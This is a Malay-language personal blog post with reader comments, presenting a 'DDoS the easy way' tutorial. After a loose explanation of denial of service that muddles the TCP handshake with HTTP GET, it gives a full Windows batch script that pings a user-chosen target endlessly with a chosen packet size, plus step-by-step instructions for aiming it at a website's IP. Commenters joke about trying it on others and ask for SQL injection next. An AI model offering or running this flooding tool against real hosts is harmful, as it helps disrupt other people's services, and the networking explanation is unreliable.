Sunday, October 28, 2012

DDoS cara senang .


DDoS - DDOS ni sebenar adalah Distributed Denial Of Service.........ia sebenarnya adalah satu serangan dari hackers dengan memflood kan certain² IP yang akan mengakibatkan network mangsa serangan menjadi lembab atau tidak berfungsi. Ini adalah kerana TCP/IP akan menghantar satu packet handshake untuk mengestablishkan connection........ 


Contoh..... 



SYN 

Client --------------> Host 


Client akan menghantar packet GET kepada host untuk mendapatkan maklumat yang dikehendaknya. Misalnya kita nak buka laman Ittutor....so kita akan taip www.example.net....betul tak.....cuba bayangkan kita menjadi packet GET, :roll: sebaik sahaja kita tekan enter...........kita akan terus ke server (host) laman web example.net......dan apabila handshake (jabat tangan) sebagai tanda kita dah setuju.....host akan hantar balik maklumat yang kita nak....... 


SYN/ACK 
Client <--------------Host 



so DDOS ni bermakna penyerang akan menghantar seberapa banyak packet GET yang kosong(tidak membawa maklumat berguna) ni sehinggakan host tak sudah tidak mampu untuk menampungnya maka terjadilah lagging dan sebagainya.... 



ader banyak jenis serangan DDOS antaranya ialah: 



Land attack 

Smurf Attack 
Udp flooding 
Ping of death 
Tear Drop 

_________________________________________________________________________________

Baiklah DDoS attack ni korang boleh lakukan dengan hanya mengunakan notepad.Pertama sekali copy+paste kod bawah ni di notepad korang :

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

Seterusnya save as kod tadi dalam note pad sebagai : DDoS attack.bat
SAVE AS TYPE : ALL TYPE
 OK.Done #


Cara-cara menggunakannya :

1. Double click file anda itu.
2. Akan tertera : Server-Target:













Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.
Contoh :
Sebelum= http://www.____.blogspot.com/
Tukarkan kepada = www.___.blogspot.com
Setelah memasukkan url itu, tekan enter.

3. Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.
Setelah selesai ping, akan keluar seperti ini :

Pinging www.___.blogspot.com [209.85.175.106] with 32 bytes of data:
Reply from XXX.XX.XXX.XXX: bytes=32 time=30ms TTL=56
Reply from XX.XX.XXX.XXX: bytes=32 time=40ms TTL=55
Reply from XX.XX.XXX.XXX: bytes=32 time=24ms TTL=56
Reply from XXX.XX.XXX.XXX: bytes=32 time=36ms TTL=56
Ping statistics for XXX.XX.XXX.XXX:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 24ms, Maximum = 40ms, Average = 32ms
XXX.XX.XXX.XXX <-----Contohlah IP address bagi www.___.blogspot.com adalah XXX.XX.XXX.XXX
Caranya sama jugak untuk website lain.













4. Selepas itu, akan terpapar di tool itu :  ip Host:
Masukkan saja ip address yg anda dapat tadi.
Contoh :
ip Host:XXX.XX.XXX.XXX
dan tekan enter.
5. Akhir sekali akan keluar pula :  Packet Size :
Letakkan berapa bnyak yg anda mahu.lagi banyak lagi kuat.
Contoh :
Packet Size : 10000000
Dan tekan enter.
6. Akan terpapar : Attacking Server.....
Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

KLIK GAMBAR KALAU X NAMPAK !
















NOTA TAPAK TANGAN :DDoS attack hanya berkesan jika diserang oleh banyak  server.Ini bermakna  hanya berkesan jika DDoS cara ni dilakukan secara berjemaah je mean bnyak org attack lah...kalau sorang je yg attack lebih baik ko gi surau berjemaah :).

MY NAME IS DIN IM NOT PROGRAMMER BUT IM GRAPHIC DESIGNER.

21 ulasan:

ikaa said...

erkkkk apakah ini??

D i n said...

ikaa : haha takde ape2 cume ddos attack je :)

Nurul Aini said...

Ohh..i see. Baru perasan ada header baru lah..smart gila. Gila dah ni.. :P

D i n said...

aini : hahah amende ni hahah

Ikhmal Malique said...

sapa pakai hosting? meh nak try.. haha.. ^^

D i n said...

ikhmal malique : haha ko try je kat sape2 kat aku ke haha

CekbOlat-bOlat said...

ddos web berlubang .

dan kepuasannya dirasai bila nama nama crew terpampang kan . bangga la satt giteww . ye dak .

havijj lak ? mohon entry strusnya :D

Ikhmal Malique said...

tak kan nak ddos blogspot kot.. huhu.
kalau ddos ip depa detect tak bro?

FJ - Faten Johary said...

ape benda ni woi . satu habuk aku ta paham aih

D i n said...

cekbolat : havijj / SQL injection kan haha..haha rasa2nya kalau ddos just kita akan trima paket kosong yang tak ada data apa2 pun jadi web akan mcm takde internet je haha kalau tepampang nama2 crew of coz depes kan haha

D i n said...

ikhmal malique : haha x taw lak x kot? haha

D i n said...

faten : haha takpa lepas ni kita main makeup lak ye hehe

FJ - Faten Johary said...

ko ni tak abeh2 perli aku kan . teringin na rasa sup penampo kew ape hahha

D i n said...

faten : mana ada perli haha

Ikhmal Malique said...

kalau nak lagi style, bahagian title tu tukaq nama sendiri. haha..

eh, bloh lu aku letak dalam bloglist. ^^

Dikbi Kamaruddin said...

m(@_@)m..bukak mata luas2 pun still x paham...#kesimpulan : mmg x paham..hihi

D i n said...

ikhmal malique : haha thanks ikhmal :) terharu pulak.

dikbi : haha maaf la :D

Dikbi Kamaruddin said...

hihi...takpe. janji kita baca jugak entri ni..hihi

D i n said...

dikbi : haha terima kasih la :D

Kelana Cinta said...

Aku semakin minat kat Abg Din nih.Kasi DDos yang lagi kuat ada?

D i n said...

kelana cinta : haha aku reti ni je aku x pandai pun nk ddos org ni :D

Related Posts Plugin for WordPress, Blogger...

FOLLOW ME ?

Google+

CBOX

Blog Archive

Entry Panas Speanjang Zaman :


Blogger Popular

Get this widget